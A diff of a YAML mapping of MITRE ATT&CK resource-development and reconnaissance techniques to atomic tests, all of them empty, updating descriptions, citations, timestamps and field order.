         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:47:46.409Z'
       name: Install Digital Certificate
       description: "Adversaries may install SSL/TLS certificates that can be used
         during targeting. SSL/TLS certificates are files that can be installed on
@@ -90705,8 +91367,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.002:
     technique:
@@ -90754,7 +91414,7 @@ resource-development:
         Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
 
         By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019)  Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:22:13.578Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: DNS Server
       x_mitre_detection: |-
@@ -90770,7 +91430,6 @@ resource-development:
       - 'Domain Name: Passive DNS'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585:
     technique:
@@ -90829,54 +91488,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
-      type: attack-pattern
-      created: '2020-10-01T01:56:24.776Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588
-        url: https://attack.mitre.org/techniques/T1588
-      - source_name: NationsBuying
-        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
-          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
-        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
-      - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
-        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
-          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
-          Human Rights Defender. Retrieved December 12, 2016.'
-        source_name: PegasusCitizenLab
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: FireEyeSupplyChain
-        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
-          SunshopFireEye. Retrieved March 6, 2017.'
-        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.568Z'
       name: Obtain Capabilities
       description: |-
         Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
@@ -90887,22 +91502,66 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
       - 'Malware Repository: Malware Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+      created: '2020-10-01T01:56:24.776Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588
+        external_id: T1588
+      - source_name: PegasusCitizenLab
+        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+          Human Rights Defender. Retrieved December 12, 2016.'
+        url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+      - source_name: FireEyeSupplyChain
+        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+          SunshopFireEye. Retrieved March 6, 2017.'
+        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: NationsBuying
+        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1650:
     technique:
@@ -90965,37 +91624,38 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.007:
     technique:
-      modified: '2022-10-20T21:19:57.555Z'
+      modified: '2024-10-03T14:18:34.045Z'
       name: Serverless
       description: "Adversaries may compromise serverless cloud infrastructure, such
-        as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
-        By utilizing serverless infrastructure, adversaries can make it more difficult
-        to attribute infrastructure used during operations back to them. \n\nOnce
-        compromised, the serverless runtime environment can be leveraged to either
-        respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+        as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+        can be used during targeting. By utilizing serverless infrastructure, adversaries
+        can make it more difficult to attribute infrastructure used during operations
+        back to them. \n\nOnce compromised, the serverless runtime environment can
+        be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
         traffic to an adversary-owned command and control server.(Citation: BlackWater
-        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
-        by these functions will appear to come from subdomains of common cloud providers,
-        it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+        Apps Script Abuse 2021) As traffic generated by these functions will appear
+        to come from subdomains of common cloud providers, it may be difficult to
+        distinguish from ordinary traffic to these providers - making it easier to
+        [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
         Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
         Workers)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -91019,11 +91679,14 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.004:
     technique:
@@ -91081,17 +91744,18 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.006:
     technique:
-      modified: '2023-03-13T20:35:52.302Z'
+      modified: '2024-08-14T15:03:56.383Z'
       name: SEO Poisoning
       description: |-
         Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
 
         To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
 
+        In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
         Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
 
         SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
@@ -91099,7 +91763,7 @@ resource-development:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Vijay Lalwani
       - Will Thomas, Equinix Threat Analysis Center (ETAC)
       - Will Jolliffe
@@ -91113,7 +91777,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -91146,11 +91810,18 @@ resource-development:
         description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
           September 30, 2022.
         url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+      - source_name: Chexmarx-seo
+        description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+          the Star Ranking Game. Retrieved June 18, 2024.'
+        url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+      - source_name: Checkmarx-oss-seo
+        description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+          Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+        url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.003:
     technique:
@@ -91172,7 +91843,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:19:50.018Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -91190,47 +91861,10 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
-      type: attack-pattern
-      created: '2020-10-01T01:30:00.877Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1587
-        url: https://attack.mitre.org/techniques/T1587
-      - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
-        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
-          Units. Retrieved July 18, 2016.
-        source_name: Mandiant APT1
-      - source_name: Kaspersky Sofacy
-        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
-          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
-          December 10, 2015.
-        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
-      - source_name: Bitdefender StrongPity June 2020
-        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
-        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
-          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
-      - source_name: Talos Promethium June 2020
-        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
-        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
-          reach with StrongPity3 APT. Retrieved July 20, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:31:17.270Z'
       name: Develop Capabilities
       description: |-
         Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
@@ -91239,21 +91873,57 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
 
         Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+      created: '2020-10-01T01:30:00.877Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1587
+        external_id: T1587
+      - source_name: Kaspersky Sofacy
+        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+          December 10, 2015.
+        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Mandiant APT1
+        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+          Units. Retrieved July 18, 2016.
+        url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+      - source_name: Talos Promethium June 2020
+        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+          reach with StrongPity3 APT. Retrieved July 20, 2020.
+        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+      - source_name: Bitdefender StrongPity June 2020
+        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1588.005:
     technique:
@@ -91293,7 +91963,7 @@ resource-development:
         description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
           Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
           October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:14:01.255Z'
       name: Exploits
       description: |-
         Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -91312,15 +91982,13 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.001:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-24T15:10:40.270Z'
       name: Domains
       description: |-
-        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
 
         Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
 
@@ -91328,19 +91996,19 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Jeremy Galloway
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.3'
-      x_mitre_contributors:
-      - Jeremy Galloway
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -91374,55 +92042,64 @@ resource-development:
         url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 reconnaissance:
   T1592:
     technique:
-      x_mitre_platforms:
-      - PRE
+      modified: '2024-10-03T19:35:07.269Z'
+      name: Gather Victim Host Information
+      description: |-
+        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: reconnaissance
+      x_mitre_contributors:
+      - Sam Seabrook, Duke Energy
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Internet Scan: Response Content'
       type: attack-pattern
+      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
       created: '2020-10-02T16:39:33.966Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1592
         url: https://attack.mitre.org/techniques/T1592
+        external_id: T1592
       - source_name: ATT ScanBox
-        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+      - source_name: TrellixQakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
